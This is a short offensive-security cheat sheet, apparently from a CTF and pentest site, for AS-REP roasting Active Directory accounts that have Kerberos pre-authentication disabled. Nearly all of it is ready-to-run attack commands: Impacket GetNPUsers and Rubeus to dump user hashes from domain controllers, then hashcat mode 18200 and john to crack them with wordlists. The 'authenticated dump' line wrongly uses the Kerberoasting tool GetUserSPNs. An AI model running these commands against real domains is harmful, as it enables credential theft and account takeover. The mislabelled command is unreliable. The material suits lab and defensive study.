>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Active Directory / AS-REP Roasting

AS-REP Roasting

Active Directory AD Attacks linux windows

Targets users with Kerberos pre-authentication disabled.

Impacket

impacket-GetNPUsers -format john -dc-ip forest -usersfile users.lst htb.local/forest
impacket-GetNPUsers test.local/ -dc-ip 10.10.10.1 -usersfile usernames.txt -outputfile hashes.txt

Authenticated dump (find vulnerable users automatically)

impacket-GetUserSPNs -dc-ip 192.168.50.70 -outputfile hashes.asreproast -request corp.com/pete

Rubeus (from Windows)

.\Rubeus.exe asreproast /nowrap
.\Rubeus.exe asreproast /outfile:hashes.txt

Crack with hashcat (mode 18200)

sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Crack with john

john asrep.txt --wordlist=/root/Desktop/AD-Lab/PasswordList.txt